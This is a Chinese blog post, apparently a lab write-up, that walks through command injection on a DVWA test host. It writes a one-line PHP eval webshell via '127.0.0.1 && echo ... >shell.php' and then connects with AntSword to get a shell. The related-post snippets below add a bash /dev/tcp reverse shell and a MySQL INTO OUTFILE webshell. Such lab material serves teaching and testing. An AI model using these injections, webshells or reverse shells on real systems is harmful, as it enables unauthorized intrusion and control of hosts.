MSF模拟渗透测试之一句话木马拿shell

已于 2023-01-20 10:49:15 修改
阅读量4k 收藏 5
点赞数 2
分类专栏: MFS渗透测试 文章标签: 测试工具 运维开发
于 2022-04-08 00:03:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124029557
版权

MSF模拟渗透测试之一句话木马拿shell

文章目录

前言

一、利用命令执行漏洞,生成一句话木马文件

(1)一句话木马
127.0.0.1 && echo ^<?php @eval($_POST[‘x’]);?^> >shell.php
(2)进行渗透测试,老样子,第一步进行信息收集,nmap端口扫描,访问web站点,这里利用win7进行渗透测试,打开kali,打开目标主机的ip的dvwa进行测试。
输入127.0.0.1 && ipconfig后出现ip信息
在这里插入图片描述
(3)找到ip地址后,编写一个木马文件

127.0.0.1 && echo ^<?php @eval($_POST[‘x’]);?^> >shell.php
在执行框中输入代码后回车
在这里插入图片描述
(4)再输入127.0.0.1 && dir后回车
在这里插入图片描述
出现已经存在了shell.php文件。

二、利用一句话木马拿shell

1.复制当前网址到蚁剑,添加数据,输入密码

输入木马文件中的密码后,点击添加

代码如下(示例):
在这里插入图片描述

2.进行添加,拿shell

(1)添加后,成功拿到对方主机的shell。
在这里插入图片描述
(2)拿到shell,下一步就是进入终端,查看对方的系统信息。
在这里插入图片描述输入systeminfo后,成功返回系统信息,实验结束。

总结

本次实验是通过信息收集,端口扫描,查看对方的web站点,寻找ip地址,利用命令执行漏洞,在目标主机上生成一句话木马文件,复制网址到蚁剑进行连接,拿到shell的完整一次渗透测试过程,熟练的掌握了编写木马,蚁剑的使用过程,更清楚的了解了渗透测试的整个流程。

炫彩@之星
关注
专栏目录
渗透测试1---网络安全法规与岗位技能
初遇我ㄖ寸の热情呢?
04-14 8146
承诺: 1.绝不将所学知识用于非法目的 2.绝不做未做授权的渗透测试,不管是出于何种目的 不存在善意的渗透,没有得到授权就是违法 网络扫描: 是发包行为。自己定义的各种奇怪的包 黑客(Hacker):指技术高超的程序员或是精通网络入侵的人 黑帽黑客(又称骇客):试图破坏某个程序,系统或网络,进而窃盗,毁损,牟利或使其瘫痪的人 白帽黑客(又叫白帽子):是那些用自己的黑客技术来维护网络关系公平正...
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 1995
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
Linuxtone命令一句话(定期更新)
weixin_34242658的博客
06-25 247
来源:[url]http://bbs.linuxtone.org/thread-16-1-1.html[/url]作者:NetSeek 1.删除0字节文件 find -type f -size 0 -exec rm -rf {} \; 2.查看进程 按内存从大到小排列 ps -e-o "%C: %p : %z : %a"|sort -k5 -nr ...
一句话反弹shell
Jim的博客
08-21 4576
1.Bash: •bash–i >&/dev/tcp/10.0.0.1/80800>&1  //bash –i打开一个交互的bash, /dev/tcp建立一个socket连接, >&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。 •Linuxshell文件描述符: •1.标准输入:代码为0,使用 •2.标准输出:代码为1,使用>或>>; •3.标准错误输出:
常用一句话shell命令行
sun172270102的博客
07-09 732
1、一句话while循环 while :; do echo `data`;sleep 0.5;done 2、输出毫秒级时间 date +%Y-%m-%d ' '%H:%M:%S.%N | cut -b 1-23 3、awk命令解析shell输出 awk '{print $1,$2}' 4、排除特定目录或文件 ls | grep -v "filea \| fileb" 5、shell字符串分割 cat xxx | awk -F "-" '{print $2}' 6、xargs传参 把前序
后台生成一句话shell
weixin_33700350的博客
10-29 210
群里有人发个网站 我就看了下 思路很简单 主要要看对方有什么可以利用的 地址我就不发全了 http://www.xxx.com/ch/index.html 进入后台 后台有点像动易的 看了编辑器 是ew5.5的 没法 被管理员给补了 好吧 我们看下 系统设置 有没有利用的 在设置里我看的一项生成asp 呵呵 这个就可以利用 怎么利用呢 ...
学习渗透第一节:msf攻击永恒之蓝+生成一句话木马+绕过杀毒软件
最新发布
m0_66963559的博客
03-31 1643
1.search 漏洞名称或者代号,永恒之蓝的是ms17_010(win10和win11无这个漏洞),exploit攻击利用脚本是进行漏洞攻击,auxiliary辅助是检测漏洞是否存在。5.用set RHOSTS 目标机ip地址,把win8设置为目标机。4.关闭目标机win8的防火墙,ping通kali。渗透之路暂时终止,等我找到能用的win7镜像再继续。3.查看当前模块的设置,show options。2.use 模块前面的数字或者全称。
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 8427
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
Cfs三层靶机内网渗透模拟
weixin_68210863的博客
10-23 1084
cfs三层靶机渗透详细过程
渗透测试02
m0_63715896的博客
12-26 790
目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 如果想跟我一起讨论,那快加入我的知识星球吧!   渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布
网络渗透测试技术:远程控制与权限提升实验
2. **利用上传漏洞**:在后台管理模块发现上传文件漏洞,通过修改文件类型绕过验证,上传了一句话木马(通常为PHP代码)。 3. **利用蚁剑连接**:通过中国蚁剑尝试连接上传的木马,但因权限问题无法访问内容。 4. ...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
一句话shell命令
weixin_34189116的博客
10-13 214
1、清空以log文件结尾的文件内容 find.-typef-name"*.log"-execcp/dev/null{}\; 转载于:https://blog.51cto.com/caozm/1563206
一句话木马shell原理及菜刀的使用
热门推荐
空心菜的博客
04-12 2万+
虽然网上这种文章很多了,但自己不总结一遍不踏实。 一、一句话木马 原理 1.以PHP举例 php的eval()函数:eval($str)函数是把$str当做PHP代码执行。 比如: &lt;?php $a = 233; $str = "echo $a;"; eval($str); ?&gt; 输出结果:233 asp、aspx和php的此...
一句话shell【php】
weixin_30497527的博客
03-31 643
1.mysql执行语句拿shell Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>'); select cmd from a into outfile 'E:\\phpStudy\\PHPTutorial\\WWW\\test.php'; ...
一句话木马简介
qq_41272376的博客
02-15 7309
一句话木马简介 一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php
一句话安装msfconsole
include_heqile的博客
06-24 747
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall
「渗透」:一句话木马反弹shell的思路
binaxin的博客
10-06 2244
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
常用一句话反弹shell总结
weixin_45116657的博客
10-19 1381
哈哈哈
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值